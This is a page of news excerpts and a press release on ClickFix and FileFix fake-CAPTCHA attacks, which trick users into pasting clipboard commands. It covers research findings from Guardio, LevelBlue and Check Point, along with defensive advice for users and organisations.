Latest news with #ClickFix
Fox News
a day ago
- Fox News
CAPTCHAgeddon signals a dangerous shift
What looks like a simple "Are you human?" check is now one of the most dangerous tricks on the internet. Fake captchas have evolved into full-blown malware launchpads, thanks to a sneaky new method called ClickFix. It copies commands to your clipboard and tricks you into running them, without ever downloading a file. This shift in attack tactics is so big that researchers are calling it "CAPTCHAgeddon." It's not just a new scam. It's a viral malware delivery system that's more convincing, stealthy, and widespread than anything before it. Let's break down how this new wave of attacks works and what makes it so hard to stop. Sign up for my FREE CyberGuy ReportGet my best tech tips, urgent security alerts, and exclusive deals delivered straight to your inbox. Plus, you'll get instant access to my Ultimate Scam Survival Guide - free when you join my Back in 2024, security experts warned about fake browser update pop-ups. Victims were told to download files that turned out to be malware. But those tricks are now outdated. Enter ClickFix. Instead of asking users to install something, ClickFix loads a fake CAPTCHA screen. It looks legit, just like Google reCAPTCHA or Cloudflare's bot checks. But when you click "verify," it secretly copies a malicious PowerShell or shell script to your clipboard. From there, you're just one paste away from installing malware that steals your accounts, passwords, and files. This new trick is more convincing than any old download prompt. And it's spreading like wildfire. Fake captchas didn't stay in sketchy ad pop-ups for long. Attackers realized they could hide these tricks in places people already trust: Each attack blends into the site or service it mimics. Some CAPTCHAS even display site logos, making the trick look like it came from the page itself. This isn't a spray-and-pray scheme anymore. It's targeted social engineering wrapped in sleek design. These aren't low-effort scams. Attackers constantly evolve their tactics to avoid detection. Here's what makes this malware so stealthy: Attackers also serve the payloads through trusted-looking domains and even legitimate-looking JavaScript libraries. Security researchers at Guardio didn't just look at one attack. They analyzed thousands. By clustering command structures, domains, and payload patterns, they identified multiple threat actors using similar tactics, each with a slightly different twist. Some groups use heavily obfuscated code. Others go for speed with clean, readable scripts. But all of them rely on the same core trick: fooling you into clicking something that seems harmless. These new ClickFix scams are stealthy, convincing, and hard to detect, but you can stay safe with the right habits and tools. Here's what to do immediately: Always run the latest version of your browser and operating system. Updates patch security holes that attackers exploit. Also, use a strong antivirus software and keep it updated. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe. Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android & iOS devices at If a site asks you to paste a command into your terminal or browser console, stop. That's the main delivery method for ClickFix malware. Legitimate services will never ask you to do this. Phishing campaigns are hiding fake CAPTCHAs in legit-looking URLs on Reddit, GitHub, and even news sites. Always hover over links before clicking and double-check the domain, especially if prompted to "verify you're human." These attacks often target users whose emails or personal details are already circulating online. These services can reduce your digital footprint by requesting removal from data broker sites. While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren't cheap - and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It's what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you. Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting a free scan to find out if your personal information is already out on the web: Modern browsers like Brave, Chrome, Firefox, Safari, and Opera offer real-time protection that blocks malicious websites, including fake CAPTCHA pages. Microsoft Edge also includes strong phishing defenses through its SmartScreen filter. Make sure features like Enhanced Safe Browsing or SmartScreen are turned on. These tools detect threats before you click, giving you a critical layer of defense. Password managers don't just store your logins; they can also alert you when a site looks suspicious. If your manager won't autofill a password on a CAPTCHA screen or login page, that's a red flag. It usually means the site isn't recognized as legitimate. This small moment of hesitation can help you avoid falling for a scam. Check out the best expert-reviewed password managers of 2025 at If you land on a shady CAPTCHA page, don't just close the tab; report it. Most browsers have a "Report a security issue" option, or you can use Google Safe Browsing ( Flagging malicious pages helps stop the scam from spreading and protects others from falling victim to the same trap. Most people don't know about these clipboard-based attacks. Share this article and talk about it. Raising awareness can stop the scam from spreading. CAPTCHAgeddon marks a turning point. Malware isn't just hiding in shady downloads anymore. It's hiding in plain sight, on familiar websites, in trusted apps, and inside the buttons you click every day. This trend replaces the fake browser update scam entirely. It's smarter, faster, and harder to detect. And unless we understand how it spreads, it will only grow. Security now means thinking twice about the everyday. Even a CAPTCHA. Have you ever encountered a suspicious CAPTCHA or a strange prompt online? What tipped you off, or did you almost fall for it? Let us know by writing to us at Sign up for my FREE CyberGuy ReportGet my best tech tips, urgent security alerts, and exclusive deals delivered straight to your inbox. Plus, you'll get instant access to my Ultimate Scam Survival Guide - free when you join my Copyright 2025 All rights reserved.
Forbes
05-08-2025
- Forbes
This ‘Real World Virus' Is ‘Widespread And Dangerous' And Will Attack Your PC
It's spreading like wildfire as 'one of the most widespread and dangerous browser-based threats today.' It will 'run malicious commands, steal login info, crypto wallets and more.' If you know what to look for, you will prevent it. If not, you won't. The security team at Guardio has delved into the horror show ClickFix has become, tracking its evolution as 'cybercriminals tweak it to target users in smarter, more convincing ways.' It is, the team says, spreading like a 'real world virus." This all started as a fake captcha lure, that preyed on our casual ambivalence when it comes to the array of 'prove you are human' or prove you're not a robot" challenges. This popup is more convincing and harder to detect than fake app updates, but it's just as powerful. Once you follow these malicious instructions, your PC can be hijacked. 'What began as a niche red-team trick posing as a harmless captcha challenge, rapidly mutated into one of today's most dominant attack methods," Guardio says. 'Removing the need for file downloads, using smarter social engineering tactics, and spreading through trusted infrastructure. The result — a wave of infections ranging from mass drive-by attacks to hyper-targeted spear-phishing lures.' All of which means 'multiple threat actors are adopting and evolving this new weapon, each shaping their own flavor of CAPTCHAgeddon.' There are multiple variants of these intrusive, malicious popups. What started as a human challenge has morphed into a fake technical issue or a secure website or document that requires a settings step to open. But the common denominator is the attack itself, which instructs you to copy and paste some text (a script) into a Windows command and then run this on your PC. What happens next can vary, but it's never good. You have in effect let the attackers inside. The messages themselves are also evolving, Guardio says. 'early prompts were generic ('Please verify you are human'), but they quickly became more persuasive, adding urgency or suspicion cues like: 'Your IP address seems suspicious. Please verify' or 'Unusual activity detected. Confirm your identity'.' And those prompts may be branded as well. For example., a ' support, warning property owners of account issues or urgent customer requests. The email linked to a Booking-branded login page, but instead of asking for credentials directly, it swiftly redirected to a Booking-themed fake captcha.' Guardio mapped recent attacks and noted the way in which ClickFix is spreading virally across the world. "The fake captcha isn't just another attack vector; it's a next-gen mutation. What began as the fake browser update trick has now been outcompeted and effectively replaced by a more contagious variant. By mimicking real user flows and eliminating the need for downloads or obviously malicious payloads, fake captchas became the stealthier, more successful strain, pushing the older tactic into extinction." You have been warned — any mutation of this copy and paste lure is an attack.
Techday NZ
30-07-2025
- Business
- Techday NZ
LevelBlue warns cyber incidents jump as social engineering rises
LevelBlue has released its latest Threat Trends Report, revealing significant changes in cyberattack patterns and a marked increase in incident rates during the first half of 2025. Incident rates rise The report, analysing data from January through May 2025, shows that the percentage of LevelBlue customers experiencing cybersecurity incidents surged from 6% in the second half of 2024 to 17% in 2025. This threefold increase highlights escalating risks to organisations across various sectors. The report attributes this sharp rise in part to evolving tactics employed by cybercriminals. While Business Email Compromise (BEC) continues to be the most frequent method for gaining initial access to systems, there has been notable growth in alternative approaches. Non-BEC incidents increased by 214%, indicating that attackers are diversifying their methods to infiltrate networks. Faster breakout times LevelBlue's findings indicate that once attackers penetrate a network, they are moving laterally inside these environments at unprecedented speeds. The average breakout time (the duration between initial access and lateral movement) has now dropped to under 60 minutes, with certain cases recorded at less than 15 minutes. Social engineering surge The report points to a considerable surge in social engineering attacks, with 39% of initial access incidents linked to these techniques. This trend is particularly evident in the prevalence of fake CAPTCHA-based attacks, such as ClickFix campaigns. These campaigns, designed to trick users into providing credentials or executing malware, saw an increase of 1,450% from the second half of 2024 to the first half of 2025. A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception. They're moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they're deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn't a one-off trend – we fully expect this shift to continue throughout 2026. This detailed assessment comes from Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, underscoring a consistent and increasing sophistication in attackers' use of deception as part of their strategies. Recommendations for defence In response to these trends, LevelBlue has set out several recommendations for organisations seeking to bolster their cyber defences. These include raising awareness among users about threats posed by fake CAPTCHA attacks and other browser-based vectors, and considering restrictions on PowerShell or command prompt use for non-administrator accounts. The report suggests that firms develop and enforce caller verification protocols, such as multi-factor authentication (MFA), code words or phrases, or the use of identity verification platforms. It also advises mandatory implementation of MFA and digital certificates for VPN access, as well as deployment of jump boxes for remote desktop access from outside organisational networks. Another recommendation is the removal of Quick Assist from all end-user machines unless there is a specific business requirement, alongside following established guidelines to prevent the unauthorised download and execution of remote monitoring and management (RMM) software. The report notes that in help desk-themed attacks, threat actors may leverage other tools if Quick Assist is unavailable. Patch management also features prominently among suggested actions. Organisations are reminded to remain vigilant regarding vulnerabilities and to install updates promptly - especially where proof-of-concept exploits have been publicly released. Working together on cyber threats The LevelBlue Security Operations Centre collaborates closely with LevelBlue Labs researchers to monitor evolving threats and develop effective countermeasures. This teamwork involves sharing intelligence and methodologies as well as joint research projects, with the aim of strengthening defences across client organisations. The LevelBlue Threat Trends Report is intended to provide organisations with clear insight into current cyber threat landscapes and practical steps to reduce exposure to increasing and more sophisticated attacks.
Business Wire
30-07-2025
- Business
- Business Wire
LevelBlue 2025 Threat Trends Report, Edition Two Finds Alarming Rise in Sophisticated Social Engineering Attacks
DALLAS--(BUSINESS WIRE)-- LevelBlue, a leading provider of managed security services, strategic consulting, and threat intelligence, today released the second edition of the LevelBlue Threat Trends Report, ' Fool Me Once: How Cybercriminals are Mastering the Art of Deception.' Drawing from real-world incident data analyzed by LevelBlue Security Operations Center (SOC) and LevelBlue Labs teams, this report analyzes cyber threat activity from January 1 through May 31, 2025, revealing a dramatic surge in social engineering attacks and faster breakout times by increasingly sophisticated adversaries. According to the report, the number of cybersecurity incidents observed nearly tripled, with the number of LevelBlue customers experiencing incidents jumping from 6% in the second half of 2024 to 17% in 2025. While business email compromise (BEC) remains the most common method for initial access, non-BEC incidents rose by 214%, highlighting a broader shift in attacker behavior. Once attackers are in, they're moving at an unprecedented speed, with an average breakout time (or how fast attackers can move laterally after initial access) under 60 minutes, and in some cases, less than 15 minutes. The LevelBlue Threat Trends Report also found a massive uptick in social engineering attacks, accounting for 39% of initial access incidents observed during the first half of the year. This can be attributed to the increasing number of fake CAPTCHA social engineering attacks, especially ClickFix campaigns, which jumped 1,450% from the second half of 2024 to the first half of 2025. These attacks leverage user trust and urgency to easily gain access into organizations' networks. 'A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception,' said Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue. 'They're moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they're deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn't a one-off trend – we fully expect this shift to continue throughout 2026.' With social engineering predicted to be the intrusion vector of choice for threat actors for the second half of 2025 and into 2026, LevelBlue recommends the following best practices to help organizations protect against these threats: Educate users on fake CAPTCHA attacks like ClickFix and other browser attacks. Consider restricting PowerShell or command prompt use for non-administrator accounts. Develop and enforce caller verification protocols and processes, such as multi-factor authentication (MFA), code words or phrases, or identity verification platforms. Enforce usage of MFA and certificates for VPN access. Deploy a jump box if RDP must be used from outside the network. Remove Quick Assist from all end-user machines unless explicitly required for business and IT services. Follow guidance on preventing the download and execution of RMM software. Threat actors will have victims download other tools if Quick Assist is not available during a fake help desk attack. Stay up to date on vulnerabilities and patch releases related to applications, software, and hardware. Patch as soon as possible, especially if there is a proof-of-concept exploit released. The LevelBlue SOC works in close collaboration with LevelBlue Labs threat researchers to share timely insights and methodologies, while engaging in joint research initiatives to combat emerging cybersecurity challenges and bolster the security posture of today's organizations. Download the complete findings of the 2025 LevelBlue Threat Trends Report, Edition Two here. For a summary of the findings, read the blog here. For more information on LevelBlue and its managed security, consulting, and threat intelligence services, please visit About LevelBlue We simplify cybersecurity through award-winning managed services, experienced strategic consulting, threat intelligence, and renowned research. Our team is a seamless extension of yours, providing transparency and visibility into security posture and continuously working to strengthen it. We harness security data from numerous sources and enrich it with artificial intelligence to deliver real-time threat intelligence- this enables more accurate and precise decision making. With a large, always-on global presence, LevelBlue sets the standard for cybersecurity today and tomorrow. We easily and effectively manage risks so you can focus on your business. Welcome to LevelBlue. Cybersecurity. Simplified. Learn more at
TECHx
17-07-2025
- TECHx
FileFix: A New Social Engineering Threat Emerges
Home » Top stories » FileFix: A New Social Engineering Threat Emerges Check Point Research identifies how the new social engineering technique, FileFix, is being actively tested by threat actors in the wild. Attackers have long exploited human trust as a primary attack surface, and they're doing it again with a new technique called FileFix. FileFix is a recently uncovered social engineering attack that builds on the widely abused ClickFix tactic. Unlike ClickFix, which tricks users into running malicious commands via the Windows Run dialog, FileFix takes a subtler approach: it opens a legitimate Windows File Explorer window from a webpage and silently loads a disguised PowerShell command into the user's clipboard. When the victim pastes into the Explorer address bar, the malicious command executes. This attack relies not on software vulnerabilities but on exploiting routine user actions and trust. Within just two weeks of FileFix's public disclosure, Check Point Research observed this technique being actively tested in the wild by a known threat actor. This group previously deployed ClickFix-based phishing campaigns targeting users of major cryptocurrency platforms. The FileFix tests so far use benign payloads, signaling an imminent shift to delivering real malware. During the same period, threat group KongTuke was also found using the method in a recent campaign. With FileFix now operational in real-world campaigns, defenders must prepare for the next phase: full-scale deployment of malicious payloads using this technique. The attack infrastructure is established, and it's only a matter of time before FileFix causes significant damage. 'Threat actors began using FileFix less than two weeks after it was published, showing just how quickly cyber criminals adapt. Like ClickFix, this technique doesn't rely on complex exploits, but on manipulating routine user behavior. By shifting from the Run dialog to File Explorer, attackers are now hiding in plain sight, making detection harder and the threat more dangerous,' said Eli Smadja, Group Manager, Security Research at Check Point Software Technologies. This blog will explain how the FileFix attack works, profile the threat actor testing it, and provide actionable guidance for defenders to detect, block, and prepare for this evolving threat. Background: The Rise of FakeCaptcha/FixIt/ClickFix Attacks ClickFix is a simple but highly effective social engineering trick. It convinces users to run malicious code by pretending there's a technical problem that needs fixing, like a broken CAPTCHA or browser error. Victims are typically told to copy and paste a command into the Windows Run dialog, unknowingly infecting themselves in the process. Over the past year, ClickFix attacks have surged, evolving into one of the most common initial access methods. Attackers spoof familiar services and design convincing error messages to lower users' defenses. This success paved the way for FileFix, a new variation with even subtler execution. The FileFix Technique: An Evolution of ClickFix Social Engineering Attacks Building on the widespread success of the ClickFix social engineering attack, security researcher mr.d0x introduced FileFix on June 23, 2025, a new, stealthier technique designed to trick users into executing malicious commands without raising suspicion. Unlike ClickFix, which relies on the more noticeable Windows Run dialog, FileFix shifts the attack to the familiar and trusted environment of Windows File Explorer. This technique does not exploit software vulnerabilities; instead, it leverages user trust in everyday Windows actions to execute harmful code. How FileFix works A malicious webpage can launch a Windows Explorer window on the victim's computer. Simultaneously, JavaScript running on that webpage quietly copies a disguised PowerShell command to the user's clipboard. The victim is then instructed to paste a 'file path' into the Explorer address bar. Instead of a real file path, the pasted content is a hidden PowerShell command. When the user presses Enter, Windows Explorer executes the command, which downloads and runs malware, all without displaying any obvious warning or command prompt. To victims, this process appears to be a simple task of opening a shared file or folder, making it feel routine and safe. This subtle manipulation makes FileFix a more stealthy and potentially more dangerous evolution of the ClickFix social engineering attack. The phishing site after being updated to deliver a malicious script Our Discovery: FileFix Technique Actively Tested in the Wild by Known Threat Actors Just over two weeks after the FileFix social engineering technique was publicly disclosed, in early July 2025, Check Point Research observed cyber criminals actively testing this new attack method in real-world campaigns. The threat actor, previously known for leveraging the ClickFix technique to distribute malware such as loaders, remote access Trojans (RATs), and information stealers, has begun experimenting with FileFix as part of their phishing operations. On July 6, 2025, we detected a newly registered domain hosting a phishing page closely resembling this group's earlier campaigns. Although the embedded FileFix script initially delivered only a benign payload, the activity clearly signals that threat actors are preparing to weaponize FileFix for future malware distribution and targeted attacks. Threat Actor Profile & Past Activity This threat actor has a history of targeting users of major cryptocurrency exchanges and other legitimate services. Their primary lure technique is SEO poisoning, which involves manipulating search engine results to promote malicious sites to the top. For example, a recent attack used a malicious sponsored Bing ad (malvertising) directing a victim to a fake 1Password site, where they were tricked into executing a ClickFix script that installed a NetSupport Manager remote access tool on their machine. A signature trait of this actor's phishing pages is their consistent imitation of Cloudflare CAPTCHA or security verification screens. To broaden their reach, the actor translates their lures into multiple languages including English, Korean, Slovak, and Russian, making their campaigns global and adaptable. Phishing pages in different languages Threat actors started using the new FileFix technique less than two weeks after its publication, demonstrating how quickly cyber criminals adapt to emerging trends. Techniques like ClickFix have emerged as some of the most effective initial access methods, not through technical exploits but via low-cost, high-impact manipulation of user behavior. Preparing for the Next Wave of Social Engineering Attacks: Defending Against FileFix and ClickFix The rapid rise of the ClickFix technique in 2025 highlights that social engineering remains one of the most cost-effective and enduring methods cyber criminals use to breach defenses. This approach exploits human behavior by tricking users into unknowingly executing malicious commands on their own computers. FileFix advances this tactic by concealing harmful commands behind the seemingly harmless act of opening files in Windows File Explorer. The fact that FileFix is already being tested and used in the wild mere days after its public disclosure shows how quickly attackers adopt new techniques and adapt to the evolving cyber threat landscape. Key Recommendations for Defenders and Users Be highly suspicious of any webpage or email that asks you to perform unusual manual actions, especially copying and pasting commands into system dialogs or Windows Explorer address bars. Educate users that legitimate websites and software rarely require manual execution of commands to fix issues. Monitor phishing pages that mimic popular services or security verification screens, particularly those using Cloudflare-like templates or recurring fake identifiers like Ray IDs. Implement and fine-tune endpoint detection rules to flag suspicious clipboard activity or unusual PowerShell executions triggered by user actions. Stay current with emerging social engineering trends and regularly update user training, incident response plans, and security playbooks. Foster a culture of verification where users confirm unexpected or unusual requests with IT or security teams before acting. Staying informed and vigilant is critical to preventing attackers from turning users into unwitting accomplices. Leveraging Endpoint Protection with Check Point Harmony Endpoint Tools like Check Point's Harmony Endpoint offer advanced endpoint detection and response capabilities designed to identify suspicious behaviors, such as unusual clipboard manipulation or stealthy PowerShell command executions initiated by user interactions. By combining proactive threat hunting, behavioral analytics, and real-time blocking, Harmony Endpoint empowers organizations to detect and stop evolving social engineering attacks like FileFix and ClickFix before they cause damage. In today's fast-changing threat environment, deploying intelligent endpoint protection solutions is essential to strengthening your organization's last line of defense.
